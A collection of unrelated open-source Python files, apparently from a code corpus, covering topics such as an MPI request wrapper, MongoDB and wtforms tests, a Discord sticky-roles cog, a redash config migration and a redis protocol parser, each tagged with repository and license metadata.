if( self.valid ):
if( core.test( self.id ) ):
self.valid = False
return True
else:
return False
else:
return True
def wait(self):
# See the note above on Request.test()
if (self.valid):
self.status = core.wait( self.id )
return self.status
else:
return self.status
def __repr__(self):
return self.__str__()
def __str__(self):
if ( self.valid ):
valid="valid"
else:
valid="invalid"
if ( self.type == 'send'):
target = "destination"
else:
target = "source"
s = "< %s %s request#: %s, count: %s, datatype: %s, %s: %s, tag: %s, comm: %s >" % ( valid, self.type, self.id, self.count, self.datatype, target, self.target, self.tag, self.comm )
return s
| steder/maroonmpi | lib/request.py | Python | gpl-2.0 | 8,768 |
#Evaluate semantic space against MEN dataset
import sys
import utils
from scipy import stats
import numpy as np
from math import sqrt
#Note: this is scipy's spearman, without tie adjustment
def spearman(x,y):
return stats.spearmanr(x, y)[0]
def readMEN(annotation_file):
pairs=[]
humans=[]
f=open(annotation_file,'r')
for l in f:
l=l.rstrip('\n')
items=l.split()
pairs.append((items[0],items[1]))
humans.append(float(items[2]))
f.close()
return pairs, humans
def compute_men_spearman(dm_dict, annotation_file):
pairs, humans=readMEN(annotation_file)
system_actual=[]
human_actual=[]
count=0
for i in range(len(pairs)):
human=humans[i]
a,b=pairs[i]
if a in dm_dict and b in dm_dict:
cos=utils.cosine_similarity(dm_dict[a],dm_dict[b])
system_actual.append(cos)
human_actual.append(human)
count+=1
sp = spearman(human_actual,system_actual)
return sp,count
| minimalparts/Tutorials | FruitFly/MEN.py | Python | mit | 989 |
#!/usr/bin/python
#
# Copyright (c) SAS Institute, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
from _scriptsetup import mirrorballDir
from updatebot import config
from updatebot import current
def usage():
print 'usage: %s <platform>' % sys.argv[0]
sys.exit(1)
platform = sys.argv[1]
if platform not in os.listdir(mirrorballDir + '/config'):
usage()
restoreFile=None
if len(sys.argv) > 2:
restoreFile = sys.argv[2]
confDir = mirrorballDir + '/config/' + platform
cfg = config.UpdateBotConfig()
cfg.read(confDir + '/updatebotrc')
bot = current.Bot(cfg)
pkgMap = bot.buildgroups()
#import epdb; epdb.st()
| sassoftware/mirrorball | scripts/current_buildgroup.py | Python | apache-2.0 | 1,164 |
from . import test_sale_order_mass_action
| OCA/sale-workflow | sale_order_mass_action/tests/__init__.py | Python | agpl-3.0 | 42 |
import json
import jsonschema
from jsonschema import ValidationError
from redash import query_runner
from redash.models import DataSource
def validate_configuration(query_runner_type, configuration_json):
query_runner_class = query_runner.query_runners.get(query_runner_type, None)
if query_runner_class is None:
return False
try:
if isinstance(configuration_json, basestring):
configuration = json.loads(configuration_json)
else:
configuration = configuration_json
jsonschema.validate(configuration, query_runner_class.configuration_schema())
except (ValidationError, ValueError):
return False
return True
def update(data_source):
print "[%s] Old options: %s" % (data_source.name, data_source.options)
if validate_configuration(data_source.type, data_source.options):
print "[%s] configuration already valid. skipping." % data_source.name
return
if data_source.type == 'pg':
values = data_source.options.split(" ")
configuration = {}
for value in values:
k, v = value.split("=", 1)
configuration[k] = v
if k == 'port':
configuration[k] = int(v)
data_source.options = json.dumps(configuration)
elif data_source.type == 'mysql':
mapping = {
'Server': 'host',
'User': 'user',
'Pwd': 'passwd',
'Database': 'db'
}
values = data_source.options.split(";")
configuration = {}
for value in values:
k, v = value.split("=", 1)
configuration[mapping[k]] = v
data_source.options = json.dumps(configuration)
elif data_source.type == 'graphite':
old_config = json.loads(data_source.options)
configuration = {
"url": old_config["url"]
}
if "verify" in old_config:
configuration['verify'] = old_config['verify']
if "auth" in old_config:
configuration['username'], configuration['password'] = old_config["auth"]
data_source.options = json.dumps(configuration)
elif data_source.type == 'url':
data_source.options = json.dumps({"url": data_source.options})
elif data_source.type == 'script':
data_source.options = json.dumps({"path": data_source.options})
elif data_source.type == 'mongo':
data_source.type = 'mongodb'
else:
print "[%s] No need to convert type of: %s" % (data_source.name, data_source.type)
print "[%s] New options: %s" % (data_source.name, data_source.options)
data_source.save(only=data_source.dirty_fields)
if __name__ == '__main__':
for data_source in DataSource.select(DataSource.id, DataSource.name, DataSource.type, DataSource.options):
update(data_source)
| imsally/redash | old_migrations/0003_update_data_source_config.py | Python | bsd-2-clause | 2,861 |
from thywill_server.component import Component
from thywill_server.settings import THYWILL_CONFIG
class PushComponent(Component):
'''
The parent class for push component definitions.
'''
singleton = None
@staticmethod
def factory():
'''Get the push component object.'''
if not PushComponent.singleton:
if THYWILL_CONFIG['push']['component'] == 'orbited stomp':
from thywill_server.push.orbited_stomp.component import OrbitedStompComponent
PushComponent.singleton = OrbitedStompComponent(THYWILL_CONFIG['push']);
else:
raise NotImplementedError('No implementation for receive = ' + THYWILL_CONFIG['push']['component'])
return PushComponent.singleton
def __init__(self, config):
'''
Constructor.
:Parameters:
- config: a dictionary of configuration information
'''
raise NotImplementedError()
def push_raw_message_to_client(self, uuid, raw_message):
'''
A convenience method equivalent to push_to_client(uuid, self.wrap_push_message(raw_message))
:Parameters:
- uuid: The unique client identifier ID
- raw_message: The message to be sent
'''
self.push_to_client(uuid, self.wrap_push_message(raw_message))
def push_to_client(self, uuid, message):
'''
Push a message to a particular client.
:Parameters:
- uuid: The unique client identifier ID
- message: A PushMessage object
'''
raise NotImplementedError()
def wrap_push_message(self, raw_message):
'''
Wrap a raw message in the object needed for push_to_client.
:Parameters:
- raw_message: The message to be sent
:Return:
PushMessage object.
'''
raise NotImplementedError()
| exratione/thywill-python | thywill_server/src/thywill_server/push/push_component.py | Python | mit | 1,998 |
# -*- coding: utf-8 -*-
#
# Monk is an unobtrusive data modeling, manipulation and validation library.
# Copyright © 2011—2015 Andrey Mikhaylenko
#
# This file is part of Monk.
#
# Monk is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Monk is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Monk. If not, see <http://gnu.org/licenses/>.
"""
MongoDB integration tests
~~~~~~~~~~~~~~~~~~~~~~~~~
"""
import datetime
import pymongo
import pytest
from bson import DBRef, ObjectId
from monk import mongo
from monk import nullable, ValidationError
from monk.compat import text_type as t
class TestDocumentModel:
class Entry(mongo.Document):
structure = {
'title': t,
'author': {
'first_name': t,
'last_name': t,
},
'comments': [
{
'text': t,
'is_spam': False,
},
]
}
data = {
'title': t('Hello'),
'author': {
'first_name': t('John'),
'last_name': t('Doe'),
},
'comments': [
# XXX when do we add the default value is_spam=False?
# anything that is inside a list (0..n) cannot be included in skel.
# (just check or also append defaults) on (add / save / validate)?
{'text': t('Oh hi')},
{'text': t('Hi there'), 'is_spam': True},
],
'views_cnt': 0,
}
def test_basic_document(self):
entry = self.Entry(self.data)
assert entry['title'] == self.data['title']
with pytest.raises(KeyError):
entry['nonexistent_key']
def test_dot_expanded(self):
entry = self.Entry(self.data)
# getattr -> getitem
assert entry['title'] == self.data['title']
assert entry['title'] == entry.title
with pytest.raises(AttributeError):
entry.nonexistent_key
assert entry['author']['first_name'] == entry.author.first_name
# setattr -> setitem
entry.title = t('Bye!')
assert entry.title == t('Bye!')
assert entry.title == entry['title']
entry.author.first_name = t('Joan')
assert entry.author.first_name == t('Joan')
assert entry.author.first_name == entry['author']['first_name']
assert entry.comments[0].text == entry['comments'][0]['text']
def test_defaults(self):
entry = self.Entry(self.data)
assert entry.views_cnt == 0
def test_defaults_dict_in_list(self):
entry = self.Entry(self.data)
assert entry.comments[0].is_spam == False
def test_callable_defaults_builtin_func(self):
class Event(mongo.Document):
structure = {
'time': datetime.datetime.utcnow,
}
event = Event(time=datetime.datetime.utcnow())
event.validate()
assert isinstance(event.time, datetime.datetime)
event = Event()
event.validate()
assert isinstance(event.time, datetime.datetime)
with pytest.raises(ValidationError):
event = Event(time=datetime.date.today())
event.validate()
def test_callable_defaults_custom_func(self):
class Event(mongo.Document):
structure = {
'text': lambda: t('hello')
}
event = Event(text=t('albatross'))
event.validate()
assert isinstance(event.text, t)
assert event.text == t('albatross')
event = Event()
event.validate()
assert isinstance(event.text, t)
assert event.text == t('hello')
with pytest.raises(ValidationError):
event = Event(text=123)
event.validate()
def test_callable_defaults_custom_func_nested(self):
# Issue #1 https://bitbucket.org/neithere/monk/issue/1/callable-defaults-in-nested-structures
class Event(mongo.Document):
structure = {
'content': {
'text': lambda: t('hello')
}
}
event = Event(content=dict(text=t('albatross')))
event.validate()
assert isinstance(event.content.text, t)
assert event.content.text == t('albatross')
event = Event()
event.validate()
assert isinstance(event.content.text, t)
assert event.content.text == t('hello')
with pytest.raises(ValidationError):
event = Event(content=dict(text=123))
event.validate()
class TestMongo:
DATABASE = 'test_monk'
class Entry(mongo.Document):
collection = 'entries'
structure = {
'_id': nullable(ObjectId),
'title': t,
}
def setup_method(self, method):
self.db = pymongo.MongoClient()[self.DATABASE]
self.collection = self.db[self.Entry.collection]
self.collection.drop()
def test_query(self):
self.collection.insert({'title': t('Hello world!')})
entries = self.Entry.find(self.db, {'title': t('Hello world!')})
assert entries.count() == 1
entry = entries[0]
assert entry.title == t('Hello world!')
def test_insert(self):
entry = self.Entry(title=t('Hello'))
entry.save(self.db)
assert self.collection.find().count() == 1
assert self.collection.find({'title': t('Hello')}).count() == 1
def test_remove(self):
self.collection.insert({'title': t('Hello')})
entries = self.Entry.find(self.db)
assert entries.count() == 1
entry = entries[0]
entry.remove(self.db)
entries = self.Entry.find(self.db)
assert entries.count() == 0
def test_id(self):
entry = self.Entry(title=t('Hello'))
assert entry['_id'] is None
assert entry.get_id() is None
# save the first time
obj_id = entry.save(self.db)
assert obj_id == entry['_id']
assert self.Entry.find(self.db).count() == 1
assert [entry] == list(self.Entry.find(self.db, {'_id': obj_id}))
# update
entry.title = t('Bye')
same_id = entry.save(self.db)
assert obj_id == same_id
assert obj_id == entry['_id']
assert obj_id == entry.get_id()
assert self.Entry.find(self.db).count() == 1
def test_get_ref(self):
entry = self.Entry(title=t('Hello'))
assert entry.get_ref() is None
entry.save(self.db)
assert entry.get_ref() == DBRef(self.Entry.collection, entry.get_id())
def test_result_set_ids(self):
self.collection.insert({'title': t('Foo')})
self.collection.insert({'title': t('Bar')})
results = self.Entry.find(self.db)
ids_manual = [x.get_id() for x in results]
# new object because caching is not supported
ids = self.Entry.find(self.db).ids()
assert ids_manual == list(ids)
def test_equality(self):
"""Documents are equal if all these conditions are met:
* both inherit to the same class;
* both are stored in the same collection;
* both have assigned ids and ids are equal.
"""
a = self.Entry(title=t('Hello'))
b = self.Entry(title=t('Hello'))
assert a != b
a.save(self.db)
assert a != b
c = self.Entry.get_one(self.db)
assert a == c
b.save(self.db)
assert a != b
d = dict(title=t('Hello'))
assert a != d
class E(mongo.Document):
structure = self.Entry.structure
e = E(title=t('Hello'))
assert a != e
class F(mongo.Document):
collection = 'comments'
structure = self.Entry.structure
e = F(title=t('Hello'))
e.save(self.db)
assert a != e
def test_index_id(self):
"Index for _id is created on first save to a collection"
with pytest.raises_regexp(pymongo.errors.OperationFailure, 'no collection'):
self.collection.index_information()
self.Entry(title=t('entry')).save(self.db)
assert '_id_' in self.collection.index_information()
def test_index_custom(self):
"Index for _id is created on first save to a collection"
with pytest.raises_regexp(pymongo.errors.OperationFailure, 'no collection'):
self.collection.index_information()
class IndexedEntry(self.Entry):
indexes = {'title': None}
IndexedEntry(title=t('Hello')).save(self.db)
assert 'title_1' in self.collection.index_information()
| neithere/monk | tests/mongo_tests.py | Python | gpl-3.0 | 9,121 |
# selection sort algorithm
# complexity is O(len(L)^2)
def iterSelectSort(L):
for i in range(len(L) - 1):
minIndex = i
minVal = L[i]
j = i + 1
while j < len(L):
if L[j] < minVal:
minVal = L[j]
minIndex = j
j += 1
temp = L[i]
L[i] = L[minIndex]
L[minIndex] = temp
return L | medifle/python_6.00.1x | defIterSelectSort.py | Python | mit | 392 |
from agagd_core.models import Member
from agagd_core.tables.search import SearchResultsTable
from django.db.models import F, Q
from django.http import HttpResponseRedirect
from django.template.response import TemplateResponse
from django.urls import reverse
from django.views.generic import DetailView
from django_tables2 import RequestConfig
class SearchView(DetailView):
template_name = "search_page.html"
search_results_template_name = "search_results.html"
def get(self, request):
query = request.GET.get("q", "")
if not query:
return TemplateResponse(request, self.template_name)
if query.isdigit():
member_id = [int(query)]
return HttpResponseRedirect(reverse("players_profile", args=member_id))
member_table_data = (
Member.objects.filter(Q(member_id=F("players__pin_player")))
.filter(full_name__icontains=query)
.values(
"member_id",
"chapter_id",
"renewal_due",
"state",
"players__rating",
"country",
"full_name",
"family_name",
)
.order_by("family_name")
)
self.template_name = self.search_results_template_name
member_results_table = SearchResultsTable(member_table_data)
RequestConfig(request, paginate={"per_page": 25}).configure(
member_results_table
)
context = locals()
context["search_query"] = query
context["member_results_table"] = member_results_table
return TemplateResponse(request, self.template_name, context)
| usgo/agagd | agagd/agagd_core/views/search.py | Python | mit | 1,698 |
import discord
import os
from discord.ext import commands
from collections import defaultdict
from .utils.dataIO import dataIO
from .utils import checks
default = {
"sticky_roles": [],
"to_reapply" : {}
}
class StickyRoles:
"""Reapplies specific roles on join"""
def __init__(self, bot):
self.bot = bot
db = dataIO.load_json("data/stickyroles/stickyroles.json")
self.db = defaultdict(lambda: default.copy(), db)
@commands.group(pass_context=True, aliases=["stickyrole"])
@checks.serverowner()
async def stickyroles(self, ctx):
"""Adds / removes roles to be reapplied on join"""
if ctx.invoked_subcommand is None:
await self.bot.send_cmd_help(ctx)
@stickyroles.command(pass_context=True)
async def add(self, ctx, *, role: discord.Role):
"""Adds role to be reapplied on join"""
server = ctx.message.server
if not server.me.top_role.position > role.position:
await self.bot.say("I don't have enough permissions to add that "
"role. Remember to take role hierarchy in "
"consideration.")
return
self.db[server.id]["sticky_roles"].append(role.id)
self.save()
await self.bot.say("That role will now be reapplied on join.")
@stickyroles.command(pass_context=True)
async def remove(self, ctx, *, role: discord.Role):
"""Removes role to be reapplied on join"""
server = ctx.message.server
try:
self.db[server.id]["sticky_roles"].remove(role.id)
except ValueError:
await self.bot.say("That role was never added in the first place.")
else:
self.save()
await self.bot.say("That role won't be reapplied on join.")
@stickyroles.command(pass_context=True)
async def clear(self, ctx):
"""Removes all sticky roles"""
server = ctx.message.server
try:
del self.db[server.id]
except KeyError:
pass
self.save()
await self.bot.say("All sticky roles have been removed.")
@stickyroles.command(name="list", pass_context=True)
async def _list(self, ctx):
"""Lists sticky roles"""
server = ctx.message.server
roles = self.db[server.id].get("sticky_roles", [])
roles = [discord.utils.get(server.roles, id=r) for r in roles]
roles = [r.name for r in roles if r is not None]
if roles:
await self.bot.say("Sticky roles:\n\n" + ", ".join(roles))
else:
await self.bot.say("No sticky roles. Add some with `{}stickyroles "
"add`".format(ctx.prefix))
async def on_member_remove(self, member):
server = member.server
if server.id not in self.db:
return
save = False
settings = self.db[server.id]
for role in member.roles:
if role.id in settings["sticky_roles"]:
if member.id not in settings["to_reapply"]:
settings["to_reapply"][member.id] = []
settings["to_reapply"][member.id].append(role.id)
save = True
if save:
self.save()
async def on_member_join(self, member):
server = member.server
if server.id not in self.db:
return
settings = self.db[server.id]
if member.id not in settings["to_reapply"]:
return
to_add = []
for role_id in settings["to_reapply"][member.id]:
if role_id not in settings["sticky_roles"]:
continue
role = discord.utils.get(server.roles, id=role_id)
if role:
to_add.append(role)
del settings["to_reapply"][member.id]
if to_add:
try:
await self.bot.add_roles(member, *to_add)
except discord.Forbidden:
print("Failed to add roles to {} ({})\n{}\n"
"I lack permissions to do that."
"".format(member, member.id, to_add))
except discord.HTTPException as e:
print("Failed to add roles to {} ({})\n{}\n"
"{}"
"".format(member, member.id, to_add, e))
self.save()
def save(self):
dataIO.save_json("data/stickyroles/stickyroles.json", self.db)
def check_folders():
if not os.path.exists("data/stickyroles"):
print("Creating data/stickyroles folder...")
os.makedirs("data/stickyroles")
def check_files():
if not dataIO.is_valid_json("data/stickyroles/stickyroles.json"):
print("Creating empty stickyroles.json...")
dataIO.save_json("data/stickyroles/stickyroles.json", {})
def setup(bot):
check_folders()
check_files()
bot.add_cog(StickyRoles(bot)) | Injabie3/Red-DiscordBot | cogs/stickyroles.py | Python | gpl-3.0 | 4,930 |
# **********************************************************************
#
# Copyright (c) 2003-2011 ZeroC, Inc. All rights reserved.
#
# This copy of Ice is licensed to you under the terms described in the
# ICE_LICENSE file included in this distribution.
#
# **********************************************************************
import os, sys, traceback, time
import Ice, Test
def test(b):
if not b:
raise RuntimeError('test assertion failed')
class TestI(Test.TestIntf):
def requestFailedException(self, current=None):
pass
def unknownUserException(self, current=None):
pass
def unknownLocalException(self, current=None):
pass
def unknownException(self, current=None):
pass
def localException(self, current=None):
pass
def userException(self, current=None):
pass
def pythonException(self, current=None):
pass
def unknownExceptionWithServantException(self, current=None):
raise Ice.ObjectNotExistException()
def impossibleException(self, throw, current=None):
if throw:
raise Test.TestImpossibleException()
#
# Return a value so we can be sure that the stream position
# is reset correctly if finished() throws.
#
return "Hello"
def intfUserException(self, throw, current=None):
if throw:
raise Test.TestIntfUserException()
#
# Return a value so we can be sure that the stream position
# is reset correctly if finished() throws.
#
return "Hello"
def asyncResponse(self, current=None):
#
# Only relevant for AMD.
#
pass
def asyncException(self, current=None):
#
# Only relevant for AMD.
#
pass
def shutdown(self, current=None):
current.adapter.deactivate()
class CookieI(Test.Cookie):
def message(self):
return 'blahblah'
class ServantLocatorI(Ice.ServantLocator):
def __init__(self, category):
self._deactivated = False
self._category = category
self._requestId = -1
def __del__(self):
test(self._deactivated)
def locate(self, current):
test(not self._deactivated)
test(current.id.category == self._category or self._category == "")
if current.id.name == "unknown":
return None
test(current.id.name == "locate" or current.id.name == "finished")
if current.id.name == "locate":
self.exception(current)
#
# Ensure locate() is only called once per request.
#
test(self._requestId == -1)
self._requestId = current.requestId
return (TestI(), CookieI())
def finished(self, current, servant, cookie):
test(not self._deactivated)
#
# Ensure finished() is only called once per request.
#
test(self._requestId == current.requestId)
self._requestId = -1
test(current.id.category == self._category or self._category == "")
test(current.id.name == "locate" or current.id.name == "finished")
if current.id.name == "finished":
self.exception(current)
test(isinstance(cookie, Test.Cookie))
test(cookie.message() == 'blahblah')
def deactivate(self, category):
test(not self._deactivated)
self._deactivated = True
def exception(self, current):
if current.operation == "ice_ids":
raise Test.TestIntfUserException()
elif current.operation == "requestFailedException":
raise Ice.ObjectNotExistException()
elif current.operation == "unknownUserException":
raise Ice.UnknownUserException("reason")
elif current.operation == "unknownLocalException":
raise Ice.UnknownLocalException("reason")
elif current.operation == "unknownException":
raise Ice.UnknownException("reason")
elif current.operation == "userException":
raise Test.TestIntfUserException()
elif current.operation == "localException":
raise Ice.SocketException(0)
elif current.operation == "pythonException":
raise RuntimeError("message")
elif current.operation == "unknownExceptionWithServantException":
raise Ice.UnknownException("reason")
elif current.operation == "impossibleException":
raise Test.TestIntfUserException() # Yes, it really is meant to be TestIntfUserException.
elif current.operation == "intfUserException":
raise Test.TestImpossibleException() # Yes, it really is meant to be TestImpossibleException.
elif current.operation == "asyncResponse":
raise Test.TestImpossibleException()
elif current.operation == "asyncException":
raise Test.TestImpossibleException()
| joshmoore/zeroc-ice | py/test/Ice/servantLocator/TestI.py | Python | gpl-2.0 | 4,959 |
import pytest
from tests.common import DummyPostData
from wtforms import validators
from wtforms.fields import FormField
from wtforms.fields import StringField
from wtforms.form import Form
class AttrDict:
def __init__(self, *args, **kw):
self.__dict__.update(*args, **kw)
class ClassWithProperty(AttrDict):
@property
def a(self):
return AttrDict(self.a_) if getattr(self, "a_", None) else AttrDict()
@a.setter
def a(self, value):
self.a_ = vars(value)
def make_form(name="F", **fields):
return type(str(name), (Form,), fields)
@pytest.fixture
def F1():
F = make_form(
a=StringField(validators=[validators.DataRequired()]), b=StringField()
)
return make_form("F1", a=FormField(F))
@pytest.fixture
def F2():
F = make_form(
a=StringField(validators=[validators.DataRequired()]), b=StringField()
)
return make_form("F2", a=FormField(F, separator="::"))
def test_formdata(F1):
form = F1(DummyPostData({"a-a": ["moo"]}))
assert form.a.form.a.name == "a-a"
assert form.a["a"].data == "moo"
assert form.a["b"].data is None
assert form.validate()
def test_iteration(F1):
assert [x.name for x in F1().a] == ["a-a", "a-b"]
def test_with_obj(F1):
obj = AttrDict(a=AttrDict(a="mmm"))
form = F1(obj=obj)
assert form.a.form.a.data == "mmm"
assert form.a.form.b.data is None
obj_inner = AttrDict(a=None, b="rawr")
obj2 = AttrDict(a=obj_inner)
form.populate_obj(obj2)
assert obj2.a is obj_inner
assert obj_inner.a == "mmm"
assert obj_inner.b is None
def test_widget(F1):
assert F1().a() == (
'<table id="a">'
'<tr><th><label for="a-a">A</label></th>'
'<td><input id="a-a" name="a-a" required type="text" value=""></td></tr>'
'<tr><th><label for="a-b">B</label></th>'
'<td><input id="a-b" name="a-b" type="text" value=""></td></tr>'
"</table>"
)
def test_separator(F2):
form = F2(DummyPostData({"a-a": "fake", "a::a": "real"}))
assert form.a.a.name == "a::a"
assert form.a.a.data == "real"
assert form.validate()
def test_no_validators_or_filters(F1):
class A(Form):
a = FormField(F1, validators=[validators.DataRequired()])
with pytest.raises(TypeError):
A()
class B(Form):
a = FormField(F1, filters=[lambda x: x])
with pytest.raises(TypeError):
B()
class C(Form):
a = FormField(F1)
def validate_a(self, field):
pass
form = C()
with pytest.raises(TypeError):
form.validate()
def test_populate_missing_obj(F1):
obj = AttrDict(a=None)
obj2 = AttrDict(a=AttrDict(a="mmm"))
form = F1()
with pytest.raises(TypeError):
form.populate_obj(obj)
form.populate_obj(obj2)
def test_populate_property(F1):
obj1 = ClassWithProperty(a_={"a": "old_a", "b": "old_b"})
form = F1(DummyPostData({"a-a": "new_a", "a-b": "new_b"}))
form.populate_obj(obj1)
assert obj1.a_ == {"a": "new_a", "b": "new_b"}
obj2 = ClassWithProperty()
form.populate_obj(obj2)
assert obj1.a_ == {"a": "new_a", "b": "new_b"}
| wtforms/wtforms | tests/fields/test_form.py | Python | bsd-3-clause | 3,172 |
# SPDX-License-Identifier: GPL-3.0-or-later
# Copyright 2014-2022 Mikhail Rachinskiy
from collections.abc import Iterable
from bpy.types import Object
from .. import lib
def offset_simple(self, obs: Iterable[Object]) -> None:
offset = 0
i = 1
for ob in obs:
if ad_offset(self, ob, offset) is False:
continue
if i < self.threshold:
i += 1
else:
offset += self.offset
i = 1
def ad_offset(self, ob: Object, offset: float) -> bool:
ads = lib.ad_get(ob, self.use_ob, self.use_data, self.use_sk, self.use_mat)
if not ads:
return False
# F-Curves
fcus_frame_start = []
for ad in ads:
if ad.action:
fcus = ad.action.fcurves
for fcu in fcus:
fcus_frame_start.append(fcu.range()[0])
if fcus_frame_start:
fcu_offset = self.frame - min(fcus_frame_start) + offset
for ad in ads:
fcus = ad.action.fcurves
for fcu in fcus:
for kp in fcu.keyframe_points:
kp.co[0] += fcu_offset
kp.handle_left[0] += fcu_offset
kp.handle_right[0] += fcu_offset
# NLA
strips_frame_start = []
for ad in ads:
tracks = ad.nla_tracks
for track in tracks:
for strip in track.strips:
strips_frame_start.append(strip.frame_start)
if strips_frame_start:
min_frame_start = min(strips_frame_start)
strip_offset = self.frame - min_frame_start + offset
use_rev = min_frame_start < self.frame + strip_offset
for ad in ads:
tracks = ad.nla_tracks
for track in tracks:
strips = reversed(track.strips) if use_rev else track.strips
for strip in strips:
if use_rev:
strip.frame_end += strip_offset
strip.frame_start += strip_offset
strip.frame_end = strip.frame_end # Trigger update for strip scale value
else:
strip.frame_start += strip_offset
strip.frame_end += strip_offset
return bool(fcus_frame_start) or bool(strips_frame_start)
| mrachinskiy/commotion | op_offset/offset_ad.py | Python | gpl-3.0 | 2,297 |
import os
from src.readers.experimentxmlreader import ExperimentXMLReader
from src.readers.qtreexmlreader import QTreeXMLReader
from src.writer import Writer
RESOURCES_DIR = "/Users/alcemirsantos/Documents/Workspace/prophet-reader/resources"
ANSWERS_DIR = "/Users/alcemirsantos/Dropbox/PhD/activities/experiments/16-FOSD12 Replication/VICC2 - RiSE/Answers"
ANSWER_FILENAME = "answers.xml"
TEST_XMLFILES = ["FH.xml", "IFDEF.xml"]
data = []
def get_list_of_answers_files():
filenames = []
for subdir, dirs, files in os.walk(ANSWERS_DIR):
for filename in files:
filepath = subdir + os.sep + filename
if filepath.endswith(ANSWER_FILENAME):
filenames.append(os.path.join(ANSWERS_DIR, filepath))
else:
print "<> Disregarding: "+filepath
return filenames
def get_list_of_testfiles():
tfiles = []
for f in TEST_XMLFILES:
fname = os.path.join(RESOURCES_DIR, f)
print(fname)
tfiles.append(fname)
return tfiles
def process_experiment_xmlfile():
for filename in get_list_of_answers_files():
print "\n<> Processing: " + filename
reader = ExperimentXMLReader(filename)
data.append(reader.process())
# reader.walk()
writer = Writer()
writer.persist_summary(data)
def process_qtree_xmlfile():
for filename in get_list_of_answers_files():
print "\n<> Processing: "+filename
reader = QTreeXMLReader(filename)
data.append(reader.process())
writer = Writer()
writer.persist_summary(data)
process_qtree_xmlfile() | alcemirsantos/prophet-reader | src/main.py | Python | gpl-3.0 | 1,607 |
import logging
from datetime import datetime, timedelta
from healthysnake.levels import HARD
class Dependency:
"""An individual dependency of the system."""
STATE_HEALTHY = 'healthy'
STATE_UNHEALTHY = 'unhealthy'
DEFAULT_INTERVAL = 10
def __init__(self, name, check_func,
interval=timedelta(seconds=DEFAULT_INTERVAL), level=HARD, logger=logging.getLogger(__name__)):
"""Initialise a new dependency.
:param name: name of the dependency
:type name: str
:param check_func: health check function to update state
:type check_func: callable
:param interval: interval by which to update the state
:type interval: datetime.timedelta
:param level: severity level of the dependency
:type level: int
:param logger: logger for messaging
:type logger: logging.Logger
"""
self.name = name
self.last_updated = datetime.utcnow()
self.level = level
self._check = check_func
self._interval = interval
self._healthy = True
self._message = ''
self._logger = logger
self.update()
def __str__(self):
"""Return a string representation of the dependency.
:rtype: str
"""
return '{name} [state={state}, level={level}]'.format(
name=self.name, state=self._state_str(), level=self.level)
def _state_str(self):
"""
Return appropriate string according to dependency health.
:return: healthy / unhealthy string const
:rtype: str
"""
return self.STATE_HEALTHY if self._healthy else self.STATE_UNHEALTHY
def update(self):
"""Update the health state of the dependency."""
try:
checked_data = self._check()
if type(checked_data) == bool:
checked_data = (checked_data, '')
# TODO assert correct type here
self._healthy = checked_data[0]
self._message = checked_data[1]
except Exception as e:
self._healthy = False
self._logger.exception(e)
self.last_updated = datetime.utcnow()
def healthy(self):
"""Retrieve the current health of the dependency.
:return: current health
:rtype: tuple(bool, str)
"""
if self.due():
self.update()
return self._healthy, self._message
def due(self):
"""Check whether the dependency is due to update health status.
:return: true if due to update
:rtype: bool
"""
return datetime.utcnow() > self.next_update()
def next_update(self):
"""Calculate the next update time.
:return: the next update time
:rtype: datetime.datetime
"""
return self.last_updated + self._interval
| dammitjim/healthysnake | healthysnake/dependency.py | Python | mit | 2,881 |
from rest_framework.renderers import BrowsableAPIRenderer
class BrowsableAPIRendererWithoutForms(BrowsableAPIRenderer):
"""Renders the browsable api, but excludes the forms."""
def get_context(self, *args, **kwargs):
ctx = super().get_context(*args, **kwargs)
ctx["display_edit_forms"] = False
return ctx
def show_form_for_method(self, view, method, request, obj):
"""We never want to do this! So just return False."""
return False
def get_rendered_html_form(self, data, view, method, request):
"""Why render _any_ forms at all. This method should return
rendered HTML, so let's simply return an empty string.
"""
return ""
| django-json-api/rest_framework_ember | example/utils.py | Python | bsd-2-clause | 717 |
from tempfile import TemporaryFile
import pytest
from imgpy import Img
@pytest.mark.parametrize('image', ({
'sub': 'anima/bordered.gif',
'angle': 90
}, {
'sub': 'anima/clear.gif',
'angle': 90
}, {
'sub': 'fixed/bordered.jpg',
'angle': 90
}, {
'sub': 'fixed/clear.jpg',
'angle': 90
}, ))
def test_rotate(path, image):
with Img(fp=path(image['sub'])) as src, TemporaryFile() as tf:
src.rotate(image['angle'], expand=True)
src.save(fp=tf)
with Img(fp=tf) as dest:
assert (dest.width, dest.height, dest.frame_count) == (
src.width, src.height, src.frame_count)
| embali/imgpy | tests/test_rotate.py | Python | mit | 649 |
import errno
import socket
from itertools import chain, imap
from redis.exceptions import ConnectionError, ResponseError, InvalidResponse
class PythonParser(object):
def __init__(self):
self._fp = None
def on_connect(self, connection):
"Called when the socket connects"
self._fp = connection._sock.makefile('r')
def on_disconnect(self):
"Called when the socket disconnects"
if self._fp is not None:
self._fp.close()
self._fp = None
def read(self, length=None):
"""
Read a line from the socket is no length is specified,
otherwise read ``length`` bytes. Always strip away the newlines.
"""
try:
if length is not None:
return self._fp.read(length+2)[:-2]
return self._fp.readline()[:-2]
except (socket.error, socket.timeout), e:
raise ConnectionError("Error while reading from socket: %s" % \
(e.args,))
def read_response(self):
response = self.read()
if not response:
raise ConnectionError("Socket closed on remote end")
byte, response = response[0], response[1:]
# server returned an error
if byte == '-':
if response.startswith('ERR '):
response = response[4:]
return ResponseError(response)
if response.startswith('LOADING '):
# If we're loading the dataset into memory, kill the socket
# so we re-initialize (and re-SELECT) next time.
raise ConnectionError("Redis is loading data into memory")
# single value
elif byte == '+':
return response
# int value
elif byte == ':':
return long(response)
# bulk response
elif byte == '$':
length = int(response)
if length == -1:
return None
response = self.read(length)
return response
# multi-bulk response
elif byte == '*':
length = int(response)
if length == -1:
return None
return [self.read_response() for i in xrange(length)]
raise InvalidResponse("Protocol Error")
